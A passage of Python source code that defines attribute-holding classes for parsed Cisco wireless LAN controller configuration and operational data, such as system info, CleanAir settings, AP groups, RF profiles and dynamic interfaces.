= self.number\n\n def get_one_item(self):\n return Port()\n\n def __str__(self):\n return 'Port info for ' + self.name\n\n def __repr__(self):\n return 'Port info for ' + self.name\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Rogue_Ap(): # Can be different between software versions, this is based on 8.3.150 output\n def __init__(self, name=None):\n self.objname = 'Rogue AP Information'\n self.name = None\n self.type = 'operational' # defines if class contain operational or config data\n self.mac_address = None\n self.classification = None\n self.state = None\n self.detecting_aps = None\n self.rogue_clients_number = None\n self.highest_rssi_ap = None\n self.highest_rssi_value = None\n self.channel = None\n self.second_rssi_ap = None\n self.second_rssi_value = None\n self.last_heard = None\n self.band = None\n\n def update_name(self):\n self.name = self.mac_address\n\n def __str__(self):\n return 'Rogue AP info for ' + self.name\n\n def __repr__(self):\n return 'Rogue AP info for ' + self.name\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass System_Config(): # No lists in this part of config - subclass of wlc_config\n def __init__(self, name=None):\n self.objname = 'System Info'\n self.name = None\n self.type = 'config' # defines if class contain operational or config data\n self.name_chassis = None\n self.burned_in_mac_address = None\n self.maximum_number_of_aps_supported = None\n self.system_information = None\n self.manufacturers_name = None\n self.product_name = None\n self.build_info = None\n self.product_version = None\n self.rtos_version = None\n self.bootloader_version = None\n self.emergency_image_version = None\n self.field_recovery_image_version = None\n self.firmware_version = None\n self.oui_file_update_time = None\n self.build_type = None\n self.oui_file_last_update_time = None\n self.build_type = None\n self.system_name = None\n self.system_location = None\n self.system_contact = None\n self.system_objectid = None\n self.redundancy_mode = None\n self.ip_address = None\n self.ipv6_address = None\n self.last_reset = None\n self.system_up_time = None\n self.system_timezone_location = None\n self.system_stats_realtime_interval = None\n self.system_stats_normal_interval = None\n self.configured_country = None\n self.operating_environment = None\n self.internal_temp_alarm_limits = None\n self.internal_temperature = None\n self.mgig_temp_alarm_limits = None\n self.mgig_temperature = None\n self.external_temp_alarm_limits = None\n self.external_temperature = None\n self.fan_status = None\n self.fan_speed_mode = None\n self.power_supply_1 = None\n self.power_supply_2 = None\n self.state_of_802_11b_network = None\n self.state_of_802_11a_network = None\n self.number_of_wlans = None\n self.number_of_active_clients = None\n self.oui_classification_failure_count = None\n self.memory_current_usage = None\n self.memory_average_usage = None\n self.cpu_current_usage = None\n self.cpu_average_usage = None\n self.flash_type = None\n self.flash_size = None\n self.maximum_number_of_aps_supported = None\n self.system_nas_id = None\n self.wlc_mic_certificate_types = None\n self.licensing_type = None\n self.licensing_type_usb = None\n self.backup_controller_configuration = None\n self.ap_primary_backup_controller = None\n self.ap_secondary_backup_controller = None\n self.raid_drive_0 = None\n self.raid_drive_1 = None\n\n def __str__(self):\n return 'WLC System Information'\n\n def __repr__(self):\n return 'WLC System Information'\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Redundancy_Config(): # No lists in this part of config - subclass of wlc_config\n def __init__(self, name=None):\n self.objname = 'Redundancy Configuration'\n self.name = None\n self.type = 'mixed' # defines if class contain operational or config data\n self.redundancy_mode = None\n self.local_state = None\n self.peer_state = None\n self.unit = None\n self.unit_id = None\n self.redundancy_state = None\n self.mobility_mac = None\n self.redundancy_management_ip_address = None\n self.peer_redundancy_management_ip_address = None\n self.redundancy_port_ip_address = None\n self.peer_redundancy_port_ip_address = None\n self.peer_service_port_ip_address = None\n\n def __str__(self):\n return 'WLC redundancy config'\n\n def __repr__(self):\n return 'WLC redundancy config'\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Mobility_Config(): # No lists in this part of config - subclass of wlc_config\n def __init__(self, name=None):\n self.objname = 'Mobility Configuration'\n self.name = None\n self.type = 'config' # defines if class contain operational or config data\n self.mobility_protocol_port = None\n self.default_mobility_domain = None\n self.multicast_mode = None\n self.mobility_domain_id_for_802_11r = None\n self.mobility_keepalive_interval = None\n self.mobility_keepalive_count = None\n self.mobility_group_members_configured = None\n self.mobility_control_message_dscp_value = None\n\n def __str__(self):\n return 'WLC mobility config'\n\n def __repr__(self):\n return 'WLC mobility config'\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Network_Config(): # No lists in this part of config - subclass of wlc_config\n def __init__(self, name=None):\n self.objname = 'Network Configuration'\n self.name = None\n self.type = 'config' # defines if class contain operational or config data\n self.network_information = None\n self.rf_network_name = None\n self.dns_server_ip = None\n self.web_mode = None\n self.secure_web_mode = None\n self.secure_web_mode_cipher_option_high = None\n self.secure_web_mode_ssl_protocol = None\n self.web_csrf_check = None\n self.ocsp = None\n self.ocsp_responder_url = None\n self.secure_shell_ssh = None\n self.secure_shell_ssh_cipher_option_high = None\n self.telnet = None\n self.ethernet_multicast_forwarding = None\n self.ethernet_broadcast_forwarding = None\n self.ipv4_ap_multicast_broadcast_mode = None\n self.ipv6_ap_multicast_broadcast_mode = None\n self.igmp_snooping = None\n self.igmp_timeout = None\n self.igmp_query_interval = None\n self.mld_snooping = None\n self.mld_timeout = None\n self.mld_query_interval = None\n self.user_idle_timeout = None\n self.arp_idle_timeout = None\n self.cisco_ap_default_master = None\n self.ap_join_priority = None\n self.mgmt_via_wireless_interface = None\n self.mgmt_via_dynamic_interface = None\n self.bridge_mac_filter_config = None\n self.bridge_security_mode = None\n self.mesh_full_sector_dfs = None\n self.mesh_backhaul_rrm = None\n self.ap_fallback = None\n self.web_auth_cmcc_support = None\n self.web_auth_redirect_ports = None\n self.web_auth_proxy_redirect_ = None\n self.web_auth_captive_bypass__ = None\n self.web_auth_secure_web_ = None\n self.web_auth_secure_web_cipher_option_ = None\n self.web_auth_secure_web_sslv3_ = None\n self.web_auth_secure_redirection_ = None\n self.fast_ssid_change = None\n self.ap_discovery_nat_ip_only = None\n self.ip_mac_addr_binding_check = None\n self.link_local_bridging_status = None\n self.ccx_lite_status = None\n self.oeap_600_dual_rlan_ports = None\n self.oeap_local_network = None\n self.oeap_600_split_tunneling_printers = None\n self.webportal_online_client = None\n self.webportal_ntf_logout_client = None\n self.mdns_snooping = None\n self.mdns_query_interval = None\n self.web_color_theme = None\n self.capwap_prefer_mode = None\n self.network_profile = None\n self.client_ip_conflict_detection_dhcp = None\n self.mesh_bh_rrm = None\n self.mesh_aggressive_dca = None\n self.mesh_auto_rf = None\n self.http_profiling_port = None\n self.http_proxy_ip_address = None\n self.http_proxy_port = None\n self.wgb_client_forced_l2_roam = None\n\n def __str__(self):\n return 'WLC network config'\n\n def __repr__(self):\n return 'WLC network config'\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Dhcp_Server():\n def __init__(self, name=None):\n self.objname = 'DHCP Server Configuration'\n self.name = None\n self.type = 'operational' # defines if class contain operational or config data\n self.ip_address = None\n self.dhcp_rx_discover_count = None\n self.dhcp_tx_discover_count = None\n self.dhcp_ack_count = None\n self.dhcp_request_count = None\n self.dhcp_inform_count = None\n self.dhcp_decline_count = None\n self.dhcp_release_count = None\n self.dhcp_reply_count = None\n self.dhcp_offer_count = None\n self.dhcp_nak_count = None\n self.tx_fails = None\n self.last_rx_time = None\n self.last_tx_time = None\n\n def __str__(self):\n return 'DHCP server ' + self.name\n\n def __repr__(self):\n return 'DHCP server ' + self.name\n\n def update_name(self):\n self.name = self.ip_address\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Cleanair_24G_Config(): # No lists in this part of config - subclass of wlc_config\n def __init__(self, name=None):\n self.objname = 'CleanAir 2.4 GHz Configuration'\n self.name = None\n self.type = 'config' # defines if class contain operational or config data\n self.clean_air_solution = None\n self.air_quality_settings = None\n self.air_quality_settings_air_quality_reporting = None\n self.air_quality_settings_air_quality_reporting_period_min = None\n self.air_quality_settings_air_quality_alarms = None\n self.air_quality_settings_air_quality_alarms_air_quality_alarm_threshold = None\n self.air_quality_settings_air_quality_alarms_unclassified_interference = None\n self.air_quality_settings_air_quality_alarms_unclassified_severity_threshold = None\n self.air_quality_settings_interference_device_reporting = None\n self.air_quality_settings_interference_device_types = None\n self.air_quality_settings_interference_device_types_bluetooth_link = None\n self.air_quality_settings_interference_device_types_microwave_oven = None\n self.air_quality_settings_interference_device_types_802_11_fh = None\n self.air_quality_settings_interference_device_types_bluetooth_discovery = None\n self.air_quality_settings_interference_device_types_tdd_transmitter = None\n self.air_quality_settings_interference_device_types_jammer = None\n self.air_quality_settings_interference_device_types_continuous_transmitter = None\n self.air_quality_settings_interference_device_types_dect_like_phone = None\n self.air_quality_settings_interference_device_types_video_camera = None\n self.air_quality_settings_interference_device_types_802_15_4 = None\n self.air_quality_settings_interference_device_types_wifi_inverted = None\n self.air_quality_settings_interference_device_types_wifi_invalid_channel = None\n self.air_quality_settings_interference_device_types_superag = None\n self.air_quality_settings_interference_device_types_canopy = None\n self.air_quality_settings_interference_device_types_microsoft_device = None\n self.air_quality_settings_interference_device_types_wimax_mobile = None\n self.air_quality_settings_interference_device_types_wimax_fixed = None\n self.air_quality_settings_interference_device_types_ble_beacon = None\n self.air_quality_settings_interference_device_alarms = None\n self.air_quality_settings_interference_device_types_triggering_alarms = None\n self.air_quality_settings_interference_device_types_triggering_alarms_bluetooth_link = None\n self.air_quality_settings_interference_device_types_triggering_alarms_microwave_oven = None\n self.air_quality_settings_interference_device_types_triggering_alarms_802_11_fh = None\n self.air_quality_settings_interference_device_types_triggering_alarms_bluetooth_discovery = None\n self.air_quality_settings_interference_device_types_triggering_alarms_tdd_transmitter = None\n self.air_quality_settings_interference_device_types_triggering_alarms_jammer = None\n self.air_quality_settings_interference_device_types_triggering_alarms_continuous_transmitter = None\n self.air_quality_settings_interference_device_types_triggering_alarms_dect_like_phone = None\n self.air_quality_settings_interference_device_types_triggering_alarms_video_camera = None\n self.air_quality_settings_interference_device_types_triggering_alarms_802_15_4 = None\n self.air_quality_settings_interference_device_types_triggering_alarms_wifi_inverted = None\n self.air_quality_settings_interference_device_types_triggering_alarms_wifi_invalid_channel = None\n self.air_quality_settings_interference_device_types_triggering_alarms_superag = None\n self.air_quality_settings_interference_device_types_triggering_alarms_canopy = None\n self.air_quality_settings_interference_device_types_triggering_alarms_microsoft_device = None\n self.air_quality_settings_interference_device_types_triggering_alarms_wimax_mobile = None\n self.air_quality_settings_interference_device_types_triggering_alarms_wimax_fixed = None\n self.air_quality_settings_interference_device_types_triggering_alarms_ble_beacon = None\n self.additional_clean_air_settings = None\n self.additional_clean_air_settings_cleanair_ed_rrm_state = None\n self.additional_clean_air_settings_cleanair_ed_rrm_sensitivity = None\n self.additional_clean_air_settings_cleanair_ed_rrm_custom_threshold = None\n self.additional_clean_air_settings_cleanair_rogue_contribution = None\n self.additional_clean_air_settings_cleanair_rogue_duty_cycle_threshold = None\n self.additional_clean_air_settings_cleanair_persistent_devices_state = None\n self.additional_clean_air_settings_cleanair_persistent_device_propagation = None\n\n def __str__(self):\n return 'CleanAir 2.4 GHz config'\n\n def __repr__(self):\n return 'CleanAir 2.4 GHz config'\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Cleanair_5G_Config(): # No lists in this part of config - subclass of wlc_config\n def __init__(self, name=None):\n self.objname = 'CleanAir 5 GHz Configuration'\n self.name = None\n self.type = 'config' # defines if class contain operational or config data\n self.clean_air_solution = None\n self.air_quality_settings = None\n self.air_quality_settings_air_quality_reporting = None\n self.air_quality_settings_air_quality_reporting_period_min = None\n self.air_quality_settings_air_quality_alarms = None\n self.air_quality_settings_air_quality_alarms_air_quality_alarm_threshold = None\n self.air_quality_settings_air_quality_alarms_unclassified_interference = None\n self.air_quality_settings_air_quality_alarms_unclassified_severity_threshold = None\n self.air_quality_settings_interference_device_reporting = None\n self.air_quality_settings_interference_device_types = None\n self.air_quality_settings_interference_device_types_tdd_transmitter = None\n self.air_quality_settings_interference_device_types_jammer = None\n self.air_quality_settings_interference_device_types_continuous_transmitter = None\n self.air_quality_settings_interference_device_types_dect_like_phone = None\n self.air_quality_settings_interference_device_types_video_camera = None\n self.air_quality_settings_interference_device_types_wifi_inverted = None\n self.air_quality_settings_interference_device_types_wifi_invalid_channel = None\n self.air_quality_settings_interference_device_types_superag = None\n self.air_quality_settings_interference_device_types_canopy = None\n self.air_quality_settings_interference_device_types_wimax_mobile = None\n self.air_quality_settings_interference_device_types_wimax_fixed = None\n self.air_quality_settings_interference_device_alarms = None\n self.air_quality_settings_interference_device_types_triggering_alarms = None\n self.air_quality_settings_interference_device_types_triggering_alarms_tdd_transmitter = None\n self.air_quality_settings_interference_device_types_triggering_alarms_jammer = None\n self.air_quality_settings_interference_device_types_triggering_alarms_continuous_transmitter = None\n self.air_quality_settings_interference_device_types_triggering_alarms_dect_like_phone = None\n self.air_quality_settings_interference_device_types_triggering_alarms_video_camera = None\n self.air_quality_settings_interference_device_types_triggering_alarms_wifi_inverted = None\n self.air_quality_settings_interference_device_types_triggering_alarms_wifi_invalid_channel = None\n self.air_quality_settings_interference_device_types_triggering_alarms_superag = None\n self.air_quality_settings_interference_device_types_triggering_alarms_canopy = None\n self.air_quality_settings_interference_device_types_triggering_alarms_wimax_mobile = None\n self.air_quality_settings_interference_device_types_triggering_alarms_wimax_fixed = None\n self.additional_clean_air_settings = None\n self.additional_clean_air_settings_cleanair_ed_rrm_state = None\n self.additional_clean_air_settings_cleanair_ed_rrm_sensitivity = None\n self.additional_clean_air_settings_cleanair_ed_rrm_custom_threshold = None\n self.additional_clean_air_settings_cleanair_rogue_contribution = None\n self.additional_clean_air_settings_cleanair_rogue_duty_cycle_threshold = None\n self.additional_clean_air_settings_cleanair_persistent_devices_state = None\n self.additional_clean_air_settings_cleanair_persistent_device_propagation = None\n\n def __str__(self):\n return 'CleanAir 5 GHz config'\n\n def __repr__(self):\n return 'CleanAir 5 GHz config'\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Switch_Config(): # No lists in this part of config - subclass of wlc_config\n def __init__(self, name=None):\n self.objname = 'Switch Configuration'\n self.name = None\n self.type = 'config' # defines if class contain operational or config data\n self.d_802_3x_flow_control_mode = None\n self.fips_prerequisite_features = None\n self.wlancc_prerequisite_features = None\n self.ucapl_prerequisite_features = None\n self.last_login_information_display = None\n self.dtls_wlc_mic = None\n self.secret_obfuscation = None\n self.strong_password_check_features = None\n self.strong_password_check_features_case_check = None\n self.strong_password_check_features_consecutive_check = None\n self.strong_password_check_features_default_check = None\n self.strong_password_check_features_username_check = None\n self.strong_password_check_features_position_check = None\n self.strong_password_check_features_case_digit_check = None\n self.strong_password_check_features_min__password_length = None\n self.strong_password_check_features_min__upper_case_chars = None\n self.strong_password_check_features_min__lower_case_chars = None\n self.strong_password_check_features_min__digits_chars = None\n self.strong_password_check_features_min__special_chars = None\n self.mgmt_user = None\n self.mgmt_user_password_lifetime_days = None\n self.mgmt_user_password_lockout = None\n self.mgmt_user_lockout_attempts = None\n self.mgmt_user_lockout_timeout_mins = None\n self.snmpv3_user = None\n self.snmpv3_user_password_lifetime_days = None\n self.snmpv3_user_password_lockout = None\n self.snmpv3_user_lockout_attempts = None\n self.snmpv3_user_lockout_timeout_mins = None\n\n def __str__(self):\n return 'WLC switch config'\n\n def __repr__(self):\n return 'WLC switch config'\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Radius_Config():\n def __init__(self, name=None):\n self.objname = 'RADIUS Configuration'\n self.name = None\n self.type = 'config' # defines if class contain operational or config data\n self.vendor_id_backward_compatibility = None\n self.call_station_id_case = None\n self.accounting_call_station_id_type = None\n self.auth_call_station_id_type = None\n self.extended_source_ports_support = None\n self.aggressive_failover = None\n self.keywrap = None\n self.fallback_test = None\n self.fallback_test_test_mode = None\n self.fallback_test_probe_user_name = None\n self.fallback_test_interval_in_seconds = None\n self.mac_delimiter_for_authentication_messages = None\n self.mac_delimiter_for_accounting_messages = None\n self.radius_authentication_framed_mtu = None\n\n def __str__(self):\n return 'RADIUS config'\n\n def __repr__(self):\n return 'RADIUS config'\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Ipv6_Config():\n def __init__(self, name=None):\n self.objname = 'IPv6 global configuration'\n self.name = None\n self.type = 'config' # defines if class contain operational or config data\n self.global_config = None\n self.reachable_lifetime_value = None\n self.stale_lifetime_value = None\n self.down_lifetime_value = None\n self.ra_throttling = None\n self.ra_throttling_allow_at_least = None\n self.ra_throttling_allow_at_most = None\n self.ra_throttling_max_through = None\n self.ra_throttling_throttle_period = None\n self.ra_throttling_interval_option = None\n self.ns_mulitcast_cachemiss_forwarding = None\n self.na_mulitcast_forwarding = None\n self.ipv6_capwap_udp_lite = None\n self.operating_system_ipv6_state = None\n\n def __str__(self):\n return 'IPv6 config'\n\n def __repr__(self):\n return 'IPv6 config'\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Advanced_Config():\n def __init__(self, name=None):\n self.objname = 'Advanced configuration'\n self.name = None\n self.type = 'config' # defines if class contain operational or config data\n self.probe_request_filtering = None\n self.probes_fwd_to_controller_per_client_per_radio = None\n self.probe_request_rate_limiting_interval = None\n self.aggregate_probe_request_interval = None\n self.increased_backoff_parameters_for_probe = None\n self.eap_identity_request_timeout_seconds = None\n self.eap_identity_request_max_retries = None\n self.eap_key_index_for_dynamic_wep = None\n self.eap_max_login_ignore_identity_response = None\n self.eap_request_timeout_seconds = None\n self.eap_request_max_retries = None\n self.eapol_key_timeout_milliseconds = None\n self.eapol_key_max_retries = None\n self.eap_broadcast_key_interval = None\n self.fastpath_packet_capture = None\n self.fastpath_fast_cache_control = None\n self.fastpath_fast_testmode = None\n self.dot11_padding = None\n self.padding_size = None\n self.advanced_hotspot_commands = None\n self.anqp_4_way_state = None\n self.garp_broadcast_state = None\n self.gas_request_rate_limit = None\n self.anqp_comeback_delay = None\n\n def __str__(self):\n return 'Really advanced WLC config'\n\n def __repr__(self):\n return 'Really advanced WLC config'\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Ap_Group_Wlan(): # Special class to save info about WLAN configuration in AP group config\n def __init__(self, name=None):\n self.objname = 'Wlan_Ap_Group'\n self.name = None\n self.type = 'config' # defines if class contain operational or config data\n self.wlan_id = None\n self.interface = None\n self.nac = None\n self.radio_policy = None\n self.open_dns_profile = None\n\n def update_name(self):\n self.name = self.wlan_id\n\n def __str__(self):\n return 'WLAN config in AP Group ' + self.name\n\n def __repr__(self):\n return 'WLAN config in AP Group ' + self.name\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Ap_Group_Wlans(NamedList): # This class is important to add name attribute of AP that heard this list of APs\n def __init__(self, list_name, item_name):\n self.objname = 'Ap_Group_Wlans'\n self.item_name = 'Ap_Group_Wlan'\n self.name = None\n self.type = 'config' # defines if class contain operational or config data\n self.ap_group = None # Name of AP group that has these WLANs configured\n\n def get_one_item(self):\n return Ap_Group_Wlan()\n\n def update_name(self):\n if self.ap_group is not None:\n self.name = self.ap_group\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Ap_Group(): # Item for NamedList \"AP Groups\" - subclass of wlc_config\n def __init__(self):\n self.objname = 'AP group config'\n self.name = None\n self.site_name = None\n self.site_description = None\n self.venue_group_code = None\n self.venue_type_code = None\n self.nas_identifier = None\n self.client_traffic_qinq_enable = None\n self.dhcpv4_qinq_enable = None\n self.ap_operating_class = None\n self.capwap_prefer_mode = None\n self.antenna_monitoring_status = None\n self.rf_profile_24 = None\n self.rf_profile_5 = None\n self.fabric_flex_acl_template_name = None\n self.ap_names = None\n self.wlans = Ap_Group_Wlans('Ap_Group_Wlans', 'Ap_Group_Wlan')\n\n def update_name(self):\n if self.site_name is not None:\n self.name = self.site_name\n\n def __str__(self):\n return 'AP group config for group ' + self.name\n\n def __repr__(self):\n return 'AP group config for group ' + self.name\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Nearby_Ap(): # Can be different between software versions, this is based on 8.3.150 output\n def __init__(self, name=None):\n self.objname = 'Nearby AP Information'\n self.name = None\n self.type = 'operational' # defines if class contain operational or config data\n self.mac_address = None\n self.rssi = None\n self.channel = None\n self.bandwidth = None\n # self.ap_name = None #Name of AP that heard this nearby AP\n # self.ap_slot = None #Slot ID of AP that heard this nearby AP\n\n def update_name(self):\n self.name = self.mac_address\n\n def __str__(self):\n return 'Nearby AP info for ' + self.name\n\n def __repr__(self):\n return 'Nearby AP info for ' + self.name\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Nearby_Aps(NamedList): # This class is important to add name attribute of AP that heard this list of APs\n def __init__(self, list_name, item_name):\n self.objname = 'Nearby_Aps'\n self.item_name = 'Nearby_Ap'\n self.name = None\n self.type = 'operational' # defines if class contain operational or config data\n self.ap_name = None # Name of AP that heard these nearby APs\n self.ap_slot = None # Slot ID of AP that heard these nearby APs\n\n def get_one_item(self):\n return Nearby_Ap()\n\n def update_name(self):\n if self.ap_name is not None:\n self.name = self.ap_name + '_slot' + self.ap_slot\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Ap_Rf_Config(): # Item for NamedList \"AP RF Configs\" - subclass of wlc_config\n def __init__(self):\n self.objname = 'AP RF config'\n self.name = None\n self.type = 'operational' # defines if class contain operational or config data\n self.number_of_slots = None\n self.ap_name = None\n self.mac_address = None\n self.slot_id = None\n self.radio_type = None\n self.sub_band_type = None\n self.nearby_aps = Nearby_Aps('Nearby_Aps', 'Nearby_Ap')\n self.noise_profile = None\n self.noise_profile_channel_1 = None\n self.noise_profile_channel_2 = None\n self.noise_profile_channel_3 = None\n self.noise_profile_channel_4 = None\n self.noise_profile_channel_5 = None\n self.noise_profile_channel_6 = None\n self.noise_profile_channel_7 = None\n self.noise_profile_channel_8 = None\n self.noise_profile_channel_9 = None\n self.noise_profile_channel_10 = None\n self.noise_profile_channel_11 = None\n self.noise_profile_channel_12 = None\n self.noise_profile_channel_13 = None\n self.noise_profile_channel_14 = None\n self.noise_profile_channel_34 = None\n self.noise_profile_channel_36 = None\n self.noise_profile_channel_38 = None\n self.noise_profile_channel_40 = None\n self.noise_profile_channel_42 = None\n self.noise_profile_channel_44 = None\n self.noise_profile_channel_46 = None\n self.noise_profile_channel_48 = None\n self.noise_profile_channel_52 = None\n self.noise_profile_channel_56 = None\n self.noise_profile_channel_60 = None\n self.noise_profile_channel_64 = None\n self.noise_profile_channel_100 = None\n self.noise_profile_channel_104 = None\n self.noise_profile_channel_108 = None\n self.noise_profile_channel_112 = None\n self.noise_profile_channel_116 = None\n self.noise_profile_channel_120 = None\n self.noise_profile_channel_124 = None\n self.noise_profile_channel_128 = None\n self.noise_profile_channel_132 = None\n self.noise_profile_channel_136 = None\n self.noise_profile_channel_140 = None\n self.noise_profile_channel_144 = None\n self.noise_profile_channel_149 = None\n self.noise_profile_channel_153 = None\n self.noise_profile_channel_157 = None\n self.noise_profile_channel_161 = None\n self.noise_profile_channel_165 = None\n self.noise_profile_channel_169 = None\n self.noise_profile_channel_173 = None\n self.interference_profile = None\n self.interference_profile_channel_1 = None\n self.interference_profile_channel_2 = None\n self.interference_profile_channel_3 = None\n self.interference_profile_channel_4 = None\n self.interference_profile_channel_5 = None\n self.interference_profile_channel_6 = None\n self.interference_profile_channel_7 = None\n self.interference_profile_channel_8 = None\n self.interference_profile_channel_9 = None\n self.interference_profile_channel_10 = None\n self.interference_profile_channel_11 = None\n self.interference_profile_channel_12 = None\n self.interference_profile_channel_13 = None\n self.interference_profile_channel_14 = None\n self.interference_profile_channel_34 = None\n self.interference_profile_channel_36 = None\n self.interference_profile_channel_38 = None\n self.interference_profile_channel_40 = None\n self.interference_profile_channel_42 = None\n self.interference_profile_channel_44 = None\n self.interference_profile_channel_46 = None\n self.interference_profile_channel_48 = None\n self.interference_profile_channel_52 = None\n self.interference_profile_channel_56 = None\n self.interference_profile_channel_60 = None\n self.interference_profile_channel_64 = None\n self.interference_profile_channel_100 = None\n self.interference_profile_channel_104 = None\n self.interference_profile_channel_108 = None\n self.interference_profile_channel_112 = None\n self.interference_profile_channel_116 = None\n self.interference_profile_channel_120 = None\n self.interference_profile_channel_124 = None\n self.interference_profile_channel_128 = None\n self.interference_profile_channel_132 = None\n self.interference_profile_channel_136 = None\n self.interference_profile_channel_140 = None\n self.interference_profile_channel_144 = None\n self.interference_profile_channel_149 = None\n self.interference_profile_channel_153 = None\n self.interference_profile_channel_157 = None\n self.interference_profile_channel_161 = None\n self.interference_profile_channel_165 = None\n self.interference_profile_channel_169 = None\n self.interference_profile_channel_173 = None\n self.rogue_histogram = None\n self.rogue_histogram_channel_1 = None\n self.rogue_histogram_channel_2 = None\n self.rogue_histogram_channel_3 = None\n self.rogue_histogram_channel_4 = None\n self.rogue_histogram_channel_5 = None\n self.rogue_histogram_channel_6 = None\n self.rogue_histogram_channel_7 = None\n self.rogue_histogram_channel_8 = None\n self.rogue_histogram_channel_9 = None\n self.rogue_histogram_channel_10 = None\n self.rogue_histogram_channel_11 = None\n self.rogue_histogram_channel_12 = None\n self.rogue_histogram_channel_13 = None\n self.rogue_histogram_channel_14 = None\n self.rogue_histogram_channel_34 = None\n self.rogue_histogram_channel_36 = None\n self.rogue_histogram_channel_38 = None\n self.rogue_histogram_channel_40 = None\n self.rogue_histogram_channel_42 = None\n self.rogue_histogram_channel_44 = None\n self.rogue_histogram_channel_46 = None\n self.rogue_histogram_channel_48 = None\n self.rogue_histogram_channel_52 = None\n self.rogue_histogram_channel_56 = None\n self.rogue_histogram_channel_60 = None\n self.rogue_histogram_channel_64 = None\n self.rogue_histogram_channel_100 = None\n self.rogue_histogram_channel_104 = None\n self.rogue_histogram_channel_108 = None\n self.rogue_histogram_channel_112 = None\n self.rogue_histogram_channel_116 = None\n self.rogue_histogram_channel_120 = None\n self.rogue_histogram_channel_124 = None\n self.rogue_histogram_channel_128 = None\n self.rogue_histogram_channel_132 = None\n self.rogue_histogram_channel_136 = None\n self.rogue_histogram_channel_140 = None\n self.rogue_histogram_channel_144 = None\n self.rogue_histogram_channel_149 = None\n self.rogue_histogram_channel_153 = None\n self.rogue_histogram_channel_157 = None\n self.rogue_histogram_channel_161 = None\n self.rogue_histogram_channel_165 = None\n self.rogue_histogram_channel_169 = None\n self.rogue_histogram_channel_173 = None\n self.load_profile = None\n self.load_profile_receive_utilization = None\n self.load_profile_transmit_utilization = None\n self.load_profile_channel_utilization = None\n self.load_profile_attached_clients = None\n self.coverage_profile = None\n self.failed_clients = None\n self.client_signal_strengths = None\n self.client_signal_strengths_rssi_100_dbm = None\n self.client_signal_strengths_rssi_92_dbm = None\n self.client_signal_strengths_rssi_84_dbm = None\n self.client_signal_strengths_rssi_76_dbm = None\n self.client_signal_strengths_rssi_68_dbm = None\n self.client_signal_strengths_rssi_60_dbm = None\n self.client_signal_strengths_rssi_52_dbm = None\n self.client_signal_to_noise_ratios = None\n self.client_signal_to_noise_ratios_snr_0_db = None\n self.client_signal_to_noise_ratios_snr_5_db = None\n self.client_signal_to_noise_ratios_snr_10_db = None\n self.client_signal_to_noise_ratios_snr_15_db = None\n self.client_signal_to_noise_ratios_snr_20_db = None\n self.client_signal_to_noise_ratios_snr_25_db = None\n self.client_signal_to_noise_ratios_snr_30_db = None\n self.client_signal_to_noise_ratios_snr_35_db = None\n self.client_signal_to_noise_ratios_snr_40_db = None\n self.client_signal_to_noise_ratios_snr_45_db = None\n self.radar_information = None\n self.channel_assignment_information = None\n self.channel_assignment_information_current_channel_average_energy = None\n self.channel_assignment_information_previous_channel_average_energy = None\n self.channel_assignment_information_channel_change_count = None\n self.channel_assignment_information_last_channel_change_time = None\n self.channel_assignment_information_recommended_best_channel = None\n self.rf_parameter_recommendations = None\n self.rf_parameter_recommendations_power_level = None\n self.rf_parameter_recommendations_rts_cts_threshold = None\n self.rf_parameter_recommendations_fragmentation_threshold = None\n self.rf_parameter_recommendations_antenna_pattern = None\n\n def __str__(self):\n return 'AP RF config ' + self.name\n\n def __repr__(self):\n return 'AP RF config ' + self.name\n\n def update_name(self):\n if self.ap_name is not None and self.slot_id is not None:\n self.name = self.ap_name + '_slot' + self.slot_id\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Dynamic_Interface(): # Item for NamedList \"dynamic interface\" - subclass of wlc_config\n def __init__(self, name=None):\n self.objname = 'Dynamic Interface'\n self.name = None\n self.type = 'mixed' # defines if class contain operational or config data\n self.interface_configuration = None\n self.interface_name = None\n self.mac_address = None\n self.ip_address = None\n self.ip_netmask = None\n self.ip_gateway = None\n self.external_nat_ip_state = None\n self.external_nat_ip_address = None\n self.link_local_ipv6_address = None\n self.state_link_local_ipv6 = None\n self.ipv6_address = None\n self.state_ipv6 = None\n self.ipv6_gateway = None\n self.ipv6_gateway_mac_address = None\n self.state_ipv6_gateway = None\n self.nas_identifier = None\n self.vlan = None\n self.quarantine_vlan = None\n self.active_physical_port = None\n self.primary_physical_port = None\n self.backup_physical_port = None\n self.dhcp_proxy_mode = None\n self.primary_dhcp_server = None\n self.secondary_dhcp_server = None\n self.dhcp_option_82 = None\n self.dhcp_option_82_bridge_mode_insertion = None\n self.ipv4_acl = None\n self.url_acl = None\n self.ipv6_acl = None\n self.url_acl1 = None\n self.mdns_profile_name = None\n self.ap_manager = None\n self.guest_interface = None\n self.d_3g_vlan = None\n self.l2_multicast = None\n self.slaac = None\n self.dhcp_protocol = None\n self.speed = None\n self.duplex = None\n self.auto_negotiation = None\n self.link_status = None\n 